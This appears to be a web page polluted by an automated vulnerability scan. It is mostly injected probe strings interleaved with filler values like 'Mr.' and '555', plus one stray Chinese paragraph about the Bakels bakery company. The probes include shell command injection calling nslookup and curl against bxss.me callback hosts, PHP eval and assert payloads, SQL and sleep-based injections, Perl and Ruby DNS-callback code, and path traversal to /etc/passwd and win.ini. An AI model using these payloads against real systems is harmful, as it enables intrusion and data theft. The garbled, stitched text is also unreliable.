;(nslookup -q=cname hitjhrjcfjath84c34.bxss.me||curl hitjhrjcfjath84c34.bxss.me)|(nslookup -q=cname hitjhrjcfjath84c34.bxss.me||curl hitjhrjcfjath84c34.bxss.me)&(nslookup -q=cname hitjhrjcfjath84c34.bxss.me||curl hitjhrjcfjath84c34.bxss.me)

`(nslookup -q=cname hiteesrlbeecxeb238.bxss.me||curl hiteesrlbeecxeb238.bxss.me)`

|(nslookup -q=cname hitdokxjpzpeb4ac5c.bxss.me||curl hitdokxjpzpeb4ac5c.bxss.me)

&(nslookup -q=cname hitlqkmpwsyco0ee72.bxss.me||curl hitlqkmpwsyco0ee72.bxss.me)&'\"`0&(nslookup -q=cname hitlqkmpwsyco0ee72.bxss.me||curl hitlqkmpwsyco0ee72.bxss.me)&`'

&nslookup -q=cname hituobjviqiuccc3c3.bxss.me&'\"`0&nslookup -q=cname hituobjviqiuccc3c3.bxss.me&`'

$(nslookup -q=cname hitooqpwajtnk925f0.bxss.me||curl hitooqpwajtnk925f0.bxss.me)

(nslookup -q=cname hitmnvrhcrcvo96792.bxss.me||curl hitmnvrhcrcvo96792.bxss.me))

|echo vaavse$()\ flvwgp\nz^xyu||a #' |echo vaavse$()\ flvwgp\nz^xyu||a #|" |echo vaavse$()\ flvwgp\nz^xyu||a #

&echo hapyvd$()\ ryxhzu\nz^xyu||a #' &echo hapyvd$()\ ryxhzu\nz^xyu||a #|" &echo hapyvd$()\ ryxhzu\nz^xyu||a #

'.print(md5(31337)).'

echo qenlvx$()\ ckirhq\nz^xyu||a #' &echo qenlvx$()\ ckirhq\nz^xyu||a #|" &echo qenlvx$()\ ckirhq\nz^xyu||a #

${@print(md5(31337))}\

${@print(md5(31337))}

1*if(now()=sysdate(),sleep(15),0)

";print(md5(31337));$a="

/../../../../../../../../../../windows/system32/BITSADMIN.exe

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

/../../../../../../../../../../windows/system32/BITSADMIN.exe

dSh9t538

-1" OR 3*2>(0+5+675-675) --

-1" OR 3*2<(0+5+675-675) --

9VKhJDNS

-1" OR 3+675-675-1=0+0+0+1 --

-1" OR 2+675-675-1=0+0+0+1 --

-1' OR 3*2>(0+5+522-522) or 'YikRs8Xy'='

'.print(md5(31337)).'

&n904694=v968252

${@print(md5(31337))}\

-1' OR 3*2<(0+5+522-522) or 'YikRs8Xy'='

${@print(md5(31337))}

-1' OR 3+522-522-1=0+0+0+1 or 'YikRs8Xy'='

";print(md5(31337));$a="

-1' OR 2+522-522-1=0+0+0+1 or 'YikRs8Xy'='

&n943450=v998144

';print(md5(31337));$a='

-1' OR 3*2>(0+5+121-121) --

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

-1' OR 3*2<(0+5+121-121) --

-1' OR 3+121-121-1=0+0+0+1 --

-1' OR 2+121-121-1=0+0+0+1 --

-1 OR 3*2>(0+5+861-861)

-1 OR 3*2<(0+5+861-861)

-1 OR 3+861-861-1=0+0+0+1

".gethostbyname(lc("hitqx"."hiuvbjuc5983d.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(74).chr(108).chr(74)."

-1 OR 2+861-861-1=0+0+0+1

'.gethostbyname(lc('hitpv'.'ogpbbemm536f8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(73).chr(109).chr(82).'

-1 OR 3*2>(0+5+320-320) --

-1 OR 3*2<(0+5+320-320) --

-1 OR 3+320-320-1=0+0+0+1 --

-1 OR 2+320-320-1=0+0+0+1 --

".gethostbyname(lc("hitkn"."boftnthj2785e.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(74).chr(117).chr(65)."

'.gethostbyname(lc('hitfe'.'tgmzsbwx71712.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(86).chr(111).chr(66).'

"||sleep(27*1000)*kvyqaf||"

'||sleep(27*1000)*taubpo||'

"&&sleep(27*1000)*hqkwst&&"

'&&sleep(27*1000)*gjjjqs&&'

'"()

^(#$!@#$)(()))******

!(()&&!|*|*|

)

"||sleep(27*1000)*ypoazg||"

'||sleep(27*1000)*akgfqj||'

"&&sleep(27*1000)*rcpsuz&&"

'&&sleep(27*1000)*himsvl&&'

^(#$!@#$)(()))******

'"()

1VrYHroiO

!(()&&!|*|*|

1CPl6DPGO

Mr.

1

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

1

555

../Mr.

1

555

../../../../../../../../../../../../../../windows/win.ini

1

555

'+'A'.concat(70-3).concat(22*4).concat(99).concat(80).concat(116).concat(85)+(require'socket'

555

Mr.

1

555

"+"A".concat(70-3).concat(22*4).concat(120).concat(66).concat(122).concat(89)+(require"socket"

555

Mr.

1

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

555

Mr.

1

file:///etc/passwd

Mr.

1

../../../../../../../../../../../../../../windows/win.ini

Mr.

'+'A'.concat(70-3).concat(22*4).concat(110).concat(69).concat(97).concat(81)+(require'socket'

Socket.gethostbyname('hitiz'+'zwgjybbx6d227.bxss.me.')[3].to_s)+'

Mr.

1

555

Mr.

"+"A".concat(70-3).concat(22*4).concat(104).concat(81).concat(118).concat(67)+(require"socket"

Socket.gethostbyname("hitsb"+"jicemfeybf7a2.bxss.me.")[3].to_s)+"

Mr.

1

555

Mr.

555


Mr.

555

Mr.

555

Mr.

1

555

Mr.

555


Mr.

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

${@print(md5(31337))}

1

555

Mr.

1

555

Mr.

1

555


Mr.

1

555

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1

555


;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1

555

Mr.

1

'.print(md5(31337)).'

Mr.

1

555


Mr.

1

555

Mr.

1

${@print(md5(31337))}\

Mr.

1

${@print(md5(31337))}

Mr.

555


Mr.

555

Mr.

1

';print(md5(31337));$a='

Mr.

1

555

Mr.

555


Mr.

555

Mr.

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555


Mr.

1

555

Mr.

1

555

".gethostbyname(lc("hitde"."gedmcxylddfe6.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(86).chr(121).chr(74)."

555

'.gethostbyname(lc('hithy'.'ipdygdynd3a8e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(82).chr(109).chr(79).'

555

Mr.

".gethostbyname(lc("hitvu"."uivmlmoa1bc9d.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(66).chr(103).chr(81)."

Mr.

'.gethostbyname(lc('hitzm'.'xayhxfwl1bd84.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(71).chr(104).chr(71).'

bxss.me

1

555

c:/windows/win.ini

1

555

/etc/shells

1

555

http://bxss.me/t/fit.txt%3F.

1

555

Http://bxss.me/t/fit.txt

1

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.

1

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

1

555

'+'A'.concat(70-3).concat(22*4).concat(116).concat(67).concat(104).concat(73)+(require'socket'

555

Mr.

1

555

Mr.

1

555

"+"A".concat(70-3).concat(22*4).concat(104).concat(90).concat(98).concat(84)+(require"socket"

555

Mr.

1

555

Mr.

1

555

Mr.

555

Mr.

1

555

Mr.

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(102).concat(81).concat(107).concat(71)+(require'socket'

Socket.gethostbyname('hitln'+'lbtidtca92e95.bxss.me.')[3].to_s)+'

Mr.

1

bxss.me

Mr.

1

c:/windows/win.ini

Mr.

"+"A".concat(70-3).concat(22*4).concat(115).concat(84).concat(98).concat(71)+(require"socket"

Socket.gethostbyname("hitcj"+"pqwzpjfu0250b.bxss.me.")[3].to_s)+"

./Mr.

1

555

Mr.

555

../Mr.

1

555

Mr.

1

/etc/shells

Mr.

555

Mr.

1

555

Mr.

1

http://bxss.me/t/fit.txt%3F.jpg

Mr.

555

file:///etc/passwd

1

555

Mr.

555

Mr.

1

Http://bxss.me/t/fit.txt

../../../../../../../../../../../../../../windows/win.ini

1

555

Mr.

1

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

../../../../../../../../../../../../../../etc/passwd

1

555

Mr.

555

Mr.

1

555

Mr.

1

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

1

555

Mr.

555

Mr.

1

555

Mr.

555

Mr.

1

555

Mr.

1

555

Mr.

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

555

Mr.

1

./555

Mr.

1

555

Mr.

1

../555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

file:///etc/passwd

Mr.

1

555

Mr.

1

../../../../../../../../../../../../../../windows/win.ini

Mr.

1

../../../../../../../../../../../../../../etc/passwd

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

'.print(md5(31337)).'

1

555

Mr.

1

555

Mr.

1

555

${@print(md5(31337))}\

1

555

Mr.

1

555

Mr.

1

555

${@print(md5(31337))}

1

555

Mr.

1

555

Mr.

1

555

";print(md5(31337));$a="

1

555

Mr.

1

555

Mr.

1

555

';print(md5(31337));$a='

1

555

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

555

Mr.

1

'.print(md5(31337)).'

Mr.

1

555

Mr.

555

Mr.

1

${@print(md5(31337))}\

Mr.

1

555

Mr.

1

${@print(md5(31337))}

Mr.

1

555

Mr.

1

555

Mr.

1

";print(md5(31337));$a="

Mr.

1

';print(md5(31337));$a='

Mr.

1

555

Mr.

1

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

1

555

Mr.

555

Mr.

555

".gethostbyname(lc("hitjz"."vhjpmdpva7dfc.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(81).chr(116).chr(90)."

555

'.gethostbyname(lc('hitnz'.'cjoovzqha89cd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(68).chr(106).chr(84).'

555

Mr.

555

Mr.

555

Mr.

".gethostbyname(lc("hiteq"."hbqgyimna05ed.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(81).chr(109).chr(66)."

Mr.

'.gethostbyname(lc('hitty'.'paefryhm633b1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(77).chr(111).chr(87).'

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Bernard-bakels碧琪集團的名字來源於荷蘭商人 Bakels 兄弟于1904年在荷蘭阿姆斯特丹註冊的碧琪公司。其中的一個兄弟 Bernard J. Bakels 使碧琪聲名遠揚。

今天的碧琪集團是一個名符其實的全球性公司,在全球各地都有生產廠家和精挑細選的代理商。碧琪公司的產品在120多個國家都有銷售,供烘焙食品行使用。

Mr.

1

555

Mr.

555

Mr.

555